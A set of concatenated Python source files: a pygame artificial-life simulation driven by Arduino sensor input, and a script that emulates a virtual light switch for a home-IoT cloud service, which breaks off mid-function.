if __name__ == '__main__':
main(docopt(__doc__))
|
lifebox-test.py
|
import pygame
import sys
import random
import threading
import time
from pyfirmata import ArduinoMega, util
datafromfile = [0] * 21
def map(x,in_min,in_max,out_min,out_max):
return float((float(x) - float(in_min)) * (float(out_max) - float(out_min)) / (float(in_max) - float(in_min)) + float(out_min))
def readdatafromfile(stop):
global datafromfile
while not stop:
file = open("/var/www/html/lifeboxdata", "r")
datafromfile = file.read().split("|")
#print (datafromfile[2])
time.sleep(2)
def readdatafromArduino(stop):
global datafromfile
# load default values from
file = open("/var/www/html/lifeboxdata", "r")
datafromfile = file.read().split("|")
# remove
board = ArduinoMega('/dev/ttyACM0')
it = util.Iterator(board)
it.start()
for i in range (0,11):
board.analog[i].enable_reporting()
while not stop:
#for i in range (0,11):
#if board.analog[i].read() is not None:
#print("Pin:"+str(i)+" Value:"+str(int(board.analog[i].read()*1000)))
if board.analog[i].read() is not None:
#datafromfile[16] = board.analog[8].read() # plants life expectancy
#datafromfile[20] = board.analog[10].read() # plants energy generation
print("Value:"+str(int(board.analog[9].read()*1000)))
datafromfile[17] = int(map(int(board.analog[9].read()*1000),0,1000,1,2000)) # plants nearborn chances
print ("Return:" +str(datafromfile[17]))
#datafromfile[6] = board.analog[3].read() # sp1 gathering
#datafromfile[5] = board.analog[2].read() # sp1 efficency
#datafromfile[0] = board.analog[0].read() # sp1 life exp
#datafromfile[1] = board.analog[1].read() # sp1 nearborn chances
#datafromfile[14] = board.analog[7].read() # sp2 gathering
#datafromfile[13] = board.analog[6].read() # sp2 efficency
#datafromfile[8] = board.analog[4].read() # sp2 life exp
#datafromfile[9] = board.analog[5].read() # sp2 nearborn chances
time.sleep(1)
graph_mode = 0 # show graphs
real_mode = 1 # respawn control
app_mode = 0 # via web / app or manual controller
gradient_mode = 1 # individual fade in / out linked to energy
fullscreen_mode = 0
fullscreen_graph = 0
rf = 1 # reduction factor
# run thread
stop = False
if app_mode == 0:
t = threading.Thread(target=readdatafromArduino,args=(stop,))
else:
t = threading.Thread(target=readdatafromfile,args=(stop,))
t.daemon = True
t.start()
#pygame setup
pygame.init()
pygame.font.init()
pygame.display.set_caption('LifeBox')
if fullscreen_mode == 0:
screen = pygame.display.set_mode((1000,600))
x_array = 32
y_array = 32
circle_size = 5
else:
# size for full HD screen (1920,1080)
# if you have other screen size, you need yo change x_array,y_array and circle_size
screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)
x_array = 70
y_array = 52
circle_size = 7
textfont = pygame.font.SysFont('arial',30)
# colors
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
bluegraph = (0,0,255,50)
yellow = (255,255,0)
yellowgraph = (255,255,0,50)
magenta = (255,0,255)
white = (255,255,255)
whitegraph = (255,255,255,50)
midgrey = (128,128,128)
black = (0,0,0)
darkgrey = (30,30,30)
lightgrey = (200,200,200,50)
# fps management
clock = pygame.time.Clock()
# species matrix
t, w, h = 3,x_array, y_array
# age 0 at z
# energy 1 at z
specie1 = [[[0 for x in range(t)] for y in range(h)] for z in range(w)]
specie2 = [[[0 for x in range(t)] for y in range(h)] for z in range(w)]
plants = [[[0 for x in range(t)] for y in range(h)] for z in range(w)]
# mask
#for x in range(0,10):
# for y in range(0,10):
# specie1[x][y][2] = 1
# specie2[x][y][2] = 1
# plants[x][y][2] = 1
# [x][y] [0]:age [1]:energy [2]:mask
# graph arrays
specie1_Iarray = [0 for x in range(200)]
specie2_Iarray = [0 for x in range(200)]
plants_Iarray = [0 for x in range(200)]
specie1_Earray = [0 for x in range(200)]
specie2_Earray = [0 for x in range(200)]
plants_Earray = [0 for x in range(200)]
# species variables
PLANTS_LIFE_EXPECTANCY = 40
PLANTS_RANDOM_BORN_CHANCES = 5100 # fixed
PLANTS_NEARBORN_CHANCES = 150
PLANTS_RANDOM_DIE_CHANCES = 2 # not used
PLANTS_ENERGY_BASE_PER_CYCLE = 100
# Each mana invidivual generates a defined amout of energy per cycle. This energy is gathered by the species. Low energy generation means a poor enviroment for the species to survive, and high energy generation a rich one.
#yellow
SPECIE1_LIFE_EXPECTANCY = 40
# Life expectancy is an statistical measure of the average time an organism is expected to live. Once a pixelic entity becomes stable, life expectancy determines how many reiterations does the pixel survive.
SPECIE1_RANDOM_BORN_CHANCES = 5100
# Fixed
# Parthenogesis is a rare trait among species which allows them to reproduce without mating. The species inside LifeBox! can reproduce in a similar way. In case they achieve it, offspring is randomly populated inside the grid.
# Setting this variable with a high value means less chances to reproduce that way. Otherwise, if user choose to reduce this value, parthenogenesis is more probable to happen
SPECIE1_NEARBORN_CHANCES = 25
# When two pixelic entities of the same specie are adjacent to each other, they can reproduce. This variable determines the reproduction chances, so a higher value means a higher chances to survive.
SPECIE1_RANDOM_DIE_CHANCES = 2
# NOT USED
# As in real life, LifeBox! pixelic species can die before reaching their life expectancy. Setting a low value, will allow pixelic entities to arrive at their expected life time. While a higher value will reduce seriously their chances to survive until the expected average life time.
SPECIE1_ENERGY_BASE = 250
# NOT USED
# Every spices has a defined base level of energy when it borns, this base level will condition the chances of survival at very first stages of its life.
SPECIE1_ENERGY_NEEDED_PER_CYCLE = 50
# This parameter defines the species amount of energy consumtion at each iteration. Higher values mean that the species needs more energy per iteration cycle, meaning less efficiency.
SPECIE1_MAX_ENERGY_RECOLECTED_PER_CYCLE = 100
# As the previous parameter defines the efficiency of energy consumtion, this one defines the efficiency of energy gathering from the mana. Higher values mean more gathering efficiency.
SPECIE1_ENERGY_TO_REPLICATE = 150
# NOT USED
# To allow the species replication, each individual needs to exceed an energy threshold, the minimum amount of energy needed to be able to reproduce itself. Higher values mean higher threshold.
#blue
SPECIE2_LIFE_EXPECTANCY = 40
SPECIE2_RANDOM_BORN_CHANCES = 5100 # fixed
SPECIE2_NEARBORN_CHANCES = 30
SPECIE2_RANDOM_DIE_CHANCES = 2 # not used
SPECIE2_ENERGY_BASE = 250 # not used
SPECIE2_ENERGY_NEEDED_PER_CYCLE = 50
SPECIE2_MAX_ENERGY_RECOLECTED_PER_CYCLE = 100
SPECIE2_ENERGY_TO_REPLICATE = 150 # not used
specie2_individuals = 0
specie1_individuals = 0
plants_individuals = 0
# screen for transparent graph
graphsurface = pygame.Surface((1920, 1080), pygame.SRCALPHA, 32)
while (True):
print (datafromfile[17])
msElapsed = clock.tick(20)
for event in pygame.event.get():
if event.type == pygame.QUIT:
stop = True
pygame.quit()
sys.exit()
# init totals
plants_last_individuals = plants_individuals
specie2_last_individuals = specie2_individuals
specie1_last_individuals = specie1_individuals
specie2_individuals = 0
specie1_individuals = 0
plants_individuals = 0
specie2_energy = 0
specie1_energy = 0
plants_energy = 0
screen.fill(black)
for x in range(0,x_array):
# adjacent coordinates
xp = (x+1)
if xp >= x_array:
xp = x_array - 1
xm = (x-1)
if xm < 0:
xm = 0
for y in range(0,y_array):
# calculations
# adjacent coordinates
yp = (y+1)
if yp >= y_array:
yp = y_array - 1
ym = (y-1)
if ym < 0:
ym = 0
# count the number of currently live neighbouring cells
plants_neighbours = 0
specie1_neighbours = 0
specie2_neighbours = 0
# [Plants]
if plants[x][y][0] == 0 and plants[xm][y][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xp][y][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xm][ym][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[x][ym][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xp][ym][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xm][yp][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[x][yp][0] > 0:
plants_neighbours += 1
if plants[x][y][0] == 0 and plants[xp][yp][0] > 0:
plants_neighbours += 1
# [Specie1]
if specie1[x][y][0] == 0 and specie1[xm][y][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xp][y][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xm][ym][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[x][ym][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xp][ym][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xm][yp][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[x][yp][0] > 0:
specie1_neighbours += 1
if specie1[x][y][0] == 0 and specie1[xp][yp][0] > 0:
specie1_neighbours += 1
# [Specie2]
if specie2[x][y][0] == 0 and specie2[xm][y][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xp][y][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xm][ym][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[x][ym][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xp][ym][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xm][yp][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[x][yp][0] > 0:
specie2_neighbours += 1
if specie2[x][y][0] == 0 and specie2[xp][yp][0] > 0:
specie2_neighbours += 1
# [plants logic]
# if old, plant dies
if plants[x][y][0] >= PLANTS_LIFE_EXPECTANCY + int(datafromfile[16]):
plants[x][y][0] = 0
plants[x][y][1] = 0
# if no energy, plant dies
if plants[x][y][0] > 0 and plants[x][y][0] < PLANTS_LIFE_EXPECTANCY + int(datafromfile[16]) and plants[x][y][1] <= 0:
plants[x][y][0] = 0
plants[x][y][1] = 0
# plant grows
if plants[x][y][0]>0 and plants[x][y][0] < PLANTS_LIFE_EXPECTANCY + int(datafromfile[16]):
plants[x][y][0] += 1
plants[x][y][1] = plants[x][y][1] + PLANTS_ENERGY_BASE_PER_CYCLE + int(datafromfile[20])
plants_individuals += 1
plants_energy += plants[x][y][1]
# plant reproduction
if int(datafromfile[17]) > 0 and plants[x][y][0] == 0 and plants_neighbours > 0 and plants[x][y][2] == 0:
if PLANTS_NEARBORN_CHANCES - int(datafromfile[17]) < 2:
randomborn = 2
else:
randomborn = PLANTS_NEARBORN_CHANCES - int(datafromfile[17])
random_number = random.randint(1,randomborn)
if random_number == 1:
plants[x][y][0] = 1
plants[x][y][1] = PLANTS_ENERGY_BASE_PER_CYCLE + int(datafromfile[20])
plants_individuals += 1
plants_energy += plants[x][y][1]
# spontaneous generation
if int(plants[x][y][0] == 0) and plants_neighbours == 0 and plants[x][y][2] == 0 and ((plants_last_individuals == 0 and plants_individuals == 0 and real_mode == 1) or real_mode == 0):
random_number = random.randint(1,PLANTS_RANDOM_BORN_CHANCES)
if random_number == 1:
plants[x][y][0] = 1
plants[x][y][1] = PLANTS_ENERGY_BASE_PER_CYCLE + int(datafromfile[20])
plants_individuals += 1
plants_energy += plants[x][y][1]
# [specie1 logic]
# individual alive
if specie1[x][y][0] > 0:
#print "("+str(x)+","+str(y)+") is alive"
# try to eat
if plants[x][y][1] > 0:
total_energy=0
if plants[x][y][1] > SPECIE1_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[6]):
total_energy = SPECIE1_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[6])
plants[x][y][1] = plants[x][y][1] - (SPECIE1_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[6]))
else:
total_energy = plants[x][y][1]
plants[x][y][1] = 0
specie1[x][y][1] = specie1[x][y][1] + total_energy
#print "("+str(x)+","+str(y)+") eats"
# grow and decrease energy
specie1[x][y][0] += 1
specie1[x][y][1] = specie1[x][y][1] - (SPECIE1_ENERGY_NEEDED_PER_CYCLE + int(datafromfile[5]))
#print "("+str(x)+","+str(y)+") grows"
# die if no energy
if specie1[x][y][1] < 0:
specie1[x][y][1] = 0
specie1[x][y][0] = 0
#print "("+str(x)+","+str(y)+") dies"
# try to replicate
if specie1[x][y][1] > SPECIE1_ENERGY_TO_REPLICATE and specie1[x][y][2] == 0:
available_spots = [0 for numspots in range(8)]
pos=0
if int(datafromfile[1]) > 0:
if SPECIE1_NEARBORN_CHANCES - int(datafromfile[1]) < 2:
randomborn = 2
else:
randomborn = SPECIE1_NEARBORN_CHANCES - int(datafromfile[1])
random_number = random.randint(1,randomborn)
if specie1[xm][y][0] == 0:
available_spots[pos] = 1
pos += 1
if specie1[xp][y][0] == 0:
available_spots[pos] = 2
pos += 1
if specie1[xm][ym][0] == 0:
available_spots[pos] = 3
pos += 1
if specie1[x][ym][0] == 0:
available_spots[pos] = 4
pos += 1
if specie1[xp][ym][0] == 0:
available_spots[pos] = 5
pos += 1
if specie1[xm][yp][0] == 0:
available_spots[pos] = 6
pos += 1
if specie1[x][yp][0] == 0:
available_spots[pos] = 7
pos += 1
if specie1[xp][yp][0] == 0:
available_spots[pos] = 8
pos += 1
if pos > 0:
rand_pos=random.randint(0,pos-1)
if random_number == 1:
#print "ready to reproduce at ("+str(xm)+","+str(ym)+") - ("+str(xp)+","+str(yp)+") - center ("+str(x)+","+str(y)+")"
if available_spots[rand_pos] == 1:
specie1[xm][y][0] = 1
specie1[xm][y][1] = SPECIE1_ENERGY_BASE
#print "("+str(xm)+","+str(y)+") born"
if available_spots[rand_pos] == 2:
specie1[xp][y][0] = 1
specie1[xp][y][1] = SPECIE1_ENERGY_BASE
#print "("+str(xp)+","+str(y)+") born"
if available_spots[rand_pos] == 3:
specie1[xm][ym][0] = 1
specie1[xm][ym][1] = SPECIE1_ENERGY_BASE
#print "("+str(xm)+","+str(ym)+") born"
if available_spots[rand_pos] == 4:
specie1[x][ym][0] = 1
specie1[x][ym][1] = SPECIE1_ENERGY_BASE
#print "("+str(x)+","+str(ym)+") born"
if available_spots[rand_pos] == 5:
specie1[xp][ym][0] = 1
specie1[xp][ym][1] = SPECIE1_ENERGY_BASE
#print "("+str(xp)+","+str(ym)+") born"
if available_spots[rand_pos] == 6:
specie1[xm][yp][0] = 1
specie1[xm][yp][1] = SPECIE1_ENERGY_BASE
#print "("+str(xm)+","+str(yp)+") born"
if available_spots[rand_pos] == 7:
specie1[x][yp][0] = 1
specie1[x][yp][1] = SPECIE1_ENERGY_BASE
#print "("+str(x)+","+str(yp)+") born"
if available_spots[rand_pos] == 8:
specie1[xp][yp][0] = 1
specie1[xp][yp][1] = SPECIE1_ENERGY_BASE
#print "("+str(xp)+","+str(yp)+") born"
#print "end of reproduction"
# die if too old
if specie1[x][y][0] > SPECIE1_LIFE_EXPECTANCY + int(datafromfile[0]):
specie1[x][y][1] = 0
specie1[x][y][0] = 0
#print "("+str(x)+","+str(y)+") dies"
specie1_individuals += 1
specie1_energy += specie1[x][y][1]
# if no individual is alive, random born to avoid extintion
if specie1[x][y][0] == 0 and specie1_neighbours==0 and specie1[x][y][2] == 0 and ((specie1_last_individuals == 0 and specie1_individuals == 0 and real_mode == 1) or real_mode == 0):
random_number = random.randint(1,SPECIE1_RANDOM_BORN_CHANCES)
if random_number==1:
specie1[x][y][0] = 1
specie1[x][y][1] = SPECIE1_ENERGY_BASE
#print "("+str(x)+","+str(y)+") random born"
specie1_individuals += 1
specie1_energy += specie1[x][y][1]
# [species 2 logic]
# individual alive
if specie2[x][y][0] > 0:
# try to eat
if plants[x][y][1] > 0:
total_energy=0
if plants[x][y][1] > SPECIE2_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[14]):
total_energy = SPECIE2_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[14])
plants[x][y][1] = plants[x][y][1] - (SPECIE2_MAX_ENERGY_RECOLECTED_PER_CYCLE + int(datafromfile[14]))
else:
total_energy = plants[x][y][1]
plants[x][y][1] = 0
specie2[x][y][1] = specie2[x][y][1] + total_energy
# grow and decrease energy
specie2[x][y][0] += 1
specie2[x][y][1] = specie2[x][y][1] - (SPECIE2_ENERGY_NEEDED_PER_CYCLE + int(datafromfile[13]))
# die if no energy
if specie2[x][y][1] < 0:
specie2[x][y][1] = 0
specie2[x][y][0] = 0
# try to replicate
if specie2[x][y][1] > SPECIE2_ENERGY_TO_REPLICATE and specie2[x][y][2] == 0:
available_spots = [0 for numspots in range(8)]
pos=0
if int(datafromfile[9]) > 0:
if SPECIE2_NEARBORN_CHANCES - int(datafromfile[9]) < 2:
randomborn = 2
else:
randomborn = SPECIE2_NEARBORN_CHANCES - int(datafromfile[9])
random_number = random.randint(1,randomborn)
if specie2[xm][y][0] == 0:
available_spots[pos] = 1
pos += 1
if specie2[xp][y][0] == 0:
available_spots[pos] = 2
pos += 1
if specie2[xm][ym][0] == 0:
available_spots[pos] = 3
pos += 1
if specie2[x][ym][0] == 0:
available_spots[pos] = 4
pos += 1
if specie2[xp][ym][0] == 0:
available_spots[pos] = 5
pos += 1
if specie2[xm][yp][0] == 0:
available_spots[pos] = 6
pos += 1
if specie2[x][yp][0] == 0:
available_spots[pos] = 7
pos += 1
if specie2[xp][yp][0] == 0:
available_spots[pos] = 8
pos += 1
if pos > 0:
rand_pos=random.randint(0,pos-1)
if random_number == 1:
if available_spots[rand_pos] == 1:
specie2[xm][y][0] = 1
specie2[xm][y][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 2:
specie2[xp][y][0] = 1
specie2[xp][y][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 3:
specie2[xm][ym][0] = 1
specie2[xm][ym][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 4:
specie2[x][ym][0] = 1
specie2[x][ym][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 5:
specie2[xp][ym][0] = 1
specie2[xp][ym][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 6:
specie2[xm][yp][0] = 1
specie2[xm][yp][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 7:
specie2[x][yp][0] = 1
specie2[x][yp][1] = SPECIE2_ENERGY_BASE
if available_spots[rand_pos] == 8:
specie2[xp][yp][0] = 1
specie2[xp][yp][1] = SPECIE2_ENERGY_BASE
# die if too old
if specie2[x][y][0] > SPECIE2_LIFE_EXPECTANCY + int(datafromfile[8]):
specie2[x][y][1] = 0
specie2[x][y][0] = 0
specie2_individuals += 1
specie2_energy += specie2[x][y][1]
# if no individual is alive, random born to avoid extintion
if specie2[x][y][0] == 0 and specie2_neighbours == 0 and specie2[x][y][2] == 0 and ((specie2_last_individuals == 0 and specie2_individuals == 0 and real_mode == 1) or real_mode == 0):
random_number = random.randint(1,SPECIE2_RANDOM_BORN_CHANCES)
if random_number==1:
specie2[x][y][0] = 1
specie2[x][y][1] = SPECIE2_ENERGY_BASE
specie2_individuals +=1
specie2_energy += specie2[x][y][1]
# draw
if gradient_mode == 1:
if plants[x][y][1]>255 * rf:
white = (255,255,255)
else:
white = (int(plants[x][y][1]/rf),int(plants[x][y][1]/rf),int(plants[x][y][1]/rf))
if specie1[x][y][1]>255:
yellow = (255,255,0)
else:
yellow = (int(specie1[x][y][1]/rf),int(specie1[x][y][1]/rf),0)
if specie2[x][y][1]>255 * rf:
blue = (0,0,255)
else:
blue = (0,0,int(specie2[x][y][1]/rf))
if specie1[x][y][1]+specie2[x][y][1] > 255 * rf:
magenta = (255,0,255)
else:
magenta = (int(specie1[x][y][1]/rf)+int(specie2[x][y][1]/rf),0,int((specie1[x][y][1]+specie2[x][y][1])/rf))
if specie1[x][y][0] > 0 and specie2[x][y][0] > 0:
pygame.draw.circle(screen,magenta,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if specie1[x][y][0] > 0 and specie2[x][y][0] == 0:
pygame.draw.circle(screen,yellow,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if specie1[x][y][0] == 0 and specie2[x][y][0] > 0:
pygame.draw.circle(screen,blue,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if specie1[x][y][0] == 0 and specie2[x][y][0] == 0 and plants[x][y][0] > 0:
pygame.draw.circle(screen,white,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if specie1[x][y][0] == 0 and specie2[x][y][0] == 0 and plants[x][y][0] == 0:
pygame.draw.circle(screen,black,(((x*2*circle_size)+circle_size)+40,((y*2*circle_size)+circle_size)+40),circle_size,0)
if graph_mode == 1:
# generate graphs
for x in range(1,200):
specie1_Iarray[x-1] = specie1_Iarray[x]
specie2_Iarray[x-1] = specie2_Iarray[x]
plants_Iarray[x-1] = plants_Iarray[x]
specie1_Earray[x-1] = specie1_Earray[x]
specie2_Earray[x-1] = specie2_Earray[x]
plants_Earray[x-1] = plants_Earray[x]
specie1_Iarray[199] = specie1_individuals
specie2_Iarray[199] = specie2_individuals
plants_Iarray[199] = plants_individuals
specie1_Earray[199] = specie1_energy
specie2_Earray[199] = specie2_energy
plants_Earray[199] = plants_energy
# draw graphs
pygame.draw.line(screen,midgrey,(450,350),(650,350))
pygame.draw.line(screen,midgrey,(650,350),(650,20))
pygame.draw.line(screen,midgrey,(700,350),(900,350))
pygame.draw.line(screen,midgrey,(900,350),(900,20))
text_individuals = textfont.render("Individuals",False, midgrey, black)
text_energy = textfont.render("Energy",False, midgrey, black)
screen.blit(text_individuals,(480,400))
screen.blit(text_energy,(740,400))
for x in range(0,200):
pygame.draw.line(screen,yellowgraph,(450+x,350-int(specie1_Iarray[x]/(3*rf))),(450+x,350-int(specie1_Iarray[x]/(3*rf))))
pygame.draw.line(screen,bluegraph,(450+x,350-int(specie2_Iarray[x]/(3*rf))),(450+x,350-int(specie2_Iarray[x]/(3*rf))))
pygame.draw.line(screen,lightgrey,(450+x,350-int(plants_Iarray[x]/(3*rf))),(450+x,350-int(plants_Iarray[x]/(3*rf))))
pygame.draw.line(screen,yellowgraph,(700+x,350-int(specie1_Earray[x]/(500*rf))),(700+x,350-int(specie1_Earray[x]/(500*rf))))
pygame.draw.line(screen,bluegraph,(700+x,350-int(specie2_Earray[x]/(500*rf))),(700+x,350-int(specie2_Earray[x]/(500*rf))))
pygame.draw.line(screen,lightgrey,(700+x,350-int(plants_Earray[x]/(5000*rf))),(700+x,350-int(plants_Earray[x]/(5000*rf))))
# transparent graph for fullscreen mode
if fullscreen_graph == 1 and fullscreen_mode == 1:
# generate fullscreen graphs
for x in range(1,200):
specie1_Iarray[x-1] = specie1_Iarray[x]
specie2_Iarray[x-1] = specie2_Iarray[x]
plants_Iarray[x-1] = plants_Iarray[x]
specie1_Iarray[199] = specie1_individuals
specie2_Iarray[199] = specie2_individuals
plants_Iarray[199] = plants_individuals
for x in range(0,200):
pygame.draw.rect(graphsurface,bluegraph,pygame.Rect(x*10,1080-(int(specie2_Iarray[x]/(3*rf))+int(plants_Iarray[x]/(3*rf))+int(specie1_Iarray[x]/(3*rf))),10,int(specie2_Iarray[x]/(3*rf))))
pygame.draw.rect(graphsurface,yellowgraph,pygame.Rect(x*10,1080-(int(specie1_Iarray[x]/(3*rf))+int(plants_Iarray[x]/(3*rf))),10,int(specie1_Iarray[x]/(3*rf))))
pygame.draw.rect(graphsurface,whitegraph,pygame.Rect(x*10,1080-int(plants_Iarray[x]/(3*rf)),10,int(plants_Iarray[x]/(3*rf))))
screen.blit(graphsurface,(0,0))
if graph_mode == 1:
pygame.draw.rect(screen,black,(40,40,320,320),1)
pygame.display.update()
|
virtual_light_switch.py
|
#!/usr/bin/env python
# encoding: utf-8
'''
Created on June 19, 2016
@author: David Moss
'''
# This module will emulate a light switch device.
import requests
import sys
import json
import threading
import time
import logging
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
_https_proxy = None
# input function behaves differently in Python 2.x and 3.x. And there is no raw_input in 3.x.
if hasattr(__builtins__, 'raw_input'):
input=raw_input
def main(argv=None):
if argv is None:
argv = sys.argv
else:
sys.argv.extend(argv)
parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-d", "--deviceId", dest="deviceId", help="Globally unique device ID")
parser.add_argument("-u", "--username", dest="username", help="Username")
parser.add_argument("-p", "--password", dest="password", help="Password")
parser.add_argument("-s", "--server", dest="server", help="Base server URL (app.presencepro.com)")
parser.add_argument("-b", "--brand", dest="brand", help="Brand name partner to interact with the correct servers: 'myplace', 'origin', 'presence', etc.")
parser.add_argument("--httpdebug", dest="httpdebug", action="store_true", help="HTTP debug logger output")
parser.add_argument("--https_proxy", dest="https_proxy", help="If your corporate network requires a proxy, type in the full HTTPS proxy address here (i.e. http://10.10.1.10:1080)")
# Process arguments
args = parser.parse_args()
# Extract the arguments
deviceId = args.deviceId
username = args.username
password = args.password
server = args.server
httpdebug = args.httpdebug
brand = args.brand
if brand is not None:
brand = brand.lower()
if brand == 'presence':
print(Color.BOLD + "\nPresence by People Power" + Color.END)
server = "app.presencepro.com"
elif brand == 'myplace':
print(Color.BOLD + "\nMyPlace - Smart. Simple. Secure." + Color.END)
server = "iot.peoplepowerco.com"
elif brand == 'origin':
print(Color.BOLD + "\nOrigin Home HQ" + Color.END)
server = "app.originhomehq.com.au"
elif brand == 'innogy':
print(Color.BOLD + "\ninnogy SmartHome" + Color.END)
server = "innogy.presencepro.com"
else:
sys.stderr.write("This brand does not exist: " + str(brand) + "\n\n")
return 1
if not deviceId:
deviceId = input('Specify a globally unique device ID for this virtual device: ')
global _https_proxy
_https_proxy = None
if args.https_proxy is not None:
_https_proxy = {
'https': args.https_proxy
}
# Define the bot server
if not server:
server = "https://app.presencepro.com"
if "http" not in server:
server = "https://" + server
# HTTP Debugging
if httpdebug:
try:
import http.client as http_client
except ImportError:
# Python 2
import httplib as http_client
http_client.HTTPConnection.debuglevel = 1
# You must initialize logging, otherwise you'll not see debug output.
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
# Grab the device server
device_server = _get_ensemble_server_url(server, deviceId)
# Login to your user account
app_key, user_info = _login(server, username, password)
# This is the device type of this virtual device
deviceType = 10072
# Grab the user's primary location ID
locationId = user_info['locations'][0]['id']
# Register the virtual device to your user's account
_register_device(server, app_key, locationId, deviceId, deviceType, "Virtual Light Switch")
# Persistent connection to listen for commands
# This light switch device does not receive commands, keeping this code here for templating purposes.
#t = threading.Thread(target=_listen, args=(device_server, deviceId))
#t.start()
# Menu to send data
t = threading.Thread(target=_menu, args=(device_server, deviceId))
t.start()
def _menu(device_server, device_id):
"""Print the menu of commands and let the user select a command"""
while True:
print("\n\n")
print("[" + device_id + "]: Virtual Light Switch")
print("0 - Switch off")
print("1 - Switch on")
print("2 - Fast toggle: Off / On / Off")
print("3 - Fast toggle: Off / On / Off / On / Off")
try:
value = int(input('> '))
if value == 0 or value == 1:
_do_command(device_server, device_id, value)
elif value == 2:
_do_command(device_server, device_id, 0)
_do_command(device_server, device_id, 1)
_do_command(device_server, device_id, 0)
elif value == 3:
_do_command(device_server, device_id, 0)
_do_command(device_server, device_id, 1)
_do_command(device_server, device_id, 0)
_do_command(device_server, device_id, 1)
_do_command(device_server, device_id, 0)
except ValueError:
print("???")
def _do_command(device_server, device_id, value):
'''Send a command to the server
:params device_server: Server to use
:params device_id: Device ID to command
:params value: Value to send
'''
global _https_proxy
measurementPayload = {
"version": 2,
"sequenceNumber": 1,
"proxyId": device_id,
"measures":[
{
"deviceId": device_id,
"params": [
{
"name":"ppc.switchStatus",
"value":value
}
]
}
]
}
http_headers = {"Content-Type": "application/json"}
print("Sending measurement: " + str(measurementPayload))
r = requests.post(device_server + "/deviceio/mljson", headers=http_headers, data=json.dumps(measurementPayload), proxies=_https_proxy)
print("Sent: " + str(r.text))
def _listen(device_server, deviceId):
"""Listen for commands"""
global _https_proxy
while True:
try:
print("\n[" + deviceId + "]: Listening for commands")
http_headers = {"Content-Type": "application/json"}
r = requests.get(device_server + "/deviceio/mljson", params={"id":deviceId, "timeout":60}, headers=http_headers, timeout=60, proxies=_https_proxy)
command = json.loads(r.text)
print("[" + deviceId + "]: Command received: " + str(command))
# Ack the command
commandId = command['commands'][0]['commandId']
ackPayload = {"version":2, "proxyId": deviceId, "sequenceNumber": 1, "responses": [{"commandId":commandId, "result":1}]}
result = requests.post(device_server + "/deviceio/mljson", headers=http_headers, data=json.dumps(ackPayload), proxies=_https_proxy)
except Exception as e:
print("Exception: " + str(e))
time.sleep(1)
def _login(server, username, password):
"""Get an Bot API key and User Info by login with a username and password"""
global _https_proxy
if not username:
username = input('Email address: ')
if not password:
import getpass
password = getpass.getpass('Password: ')
try:
import requests
# login by username and password
http_headers = {"PASSWORD": password, "Content-Type": "application/json"}
r = requests.get(server + "/cloud/json/login", params={"username":username}, headers=http_headers, proxies=_https_proxy)
j = json.loads(r.text)
_check_for_errors(j)
app_key = j['key']
# get user info
http_headers = {"PRESENCE_API_KEY": app_key, "Content-Type": "application/json"}
r = requests.get(server + "/cloud/json/user", headers=http_headers, proxies=_https_proxy)
j = json.loads(r.text)
_check_for_errors(j)
return app_key, j
except BotError as e:
sys.stderr.write("Error: " + e.msg)
sys.stderr.write("\nCreate an account on " + server + " and use it to sign in")
sys.stderr.write("\n\n")
raise e
def _register_device(server, appKey, locationId, deviceId, deviceType, description):
"""
Register a device to the user's account
"""
global _https_proxy
http_headers = {"API_KEY": appKey, "Content-Type": "application/json"}
r = requests.post(server + "/cloud/json/devices", params={"locationId":locationId, "deviceId":deviceId, "deviceType":deviceType, "desc":description}, headers=http_headers, proxies=_https_proxy)
j = json.loads(r.text)
_check_for_errors(j)
return j
def _get_ensemble_server_url(server, device_id=None):
"""
Get server URL
"""
global _https_proxy
import requests
http_headers = {"Content-Type": "application/json"}
params = {"type": "deviceio", "ssl": True}
if not device_id:
# to be removed
params['deviceId'] = "nodeviceid"
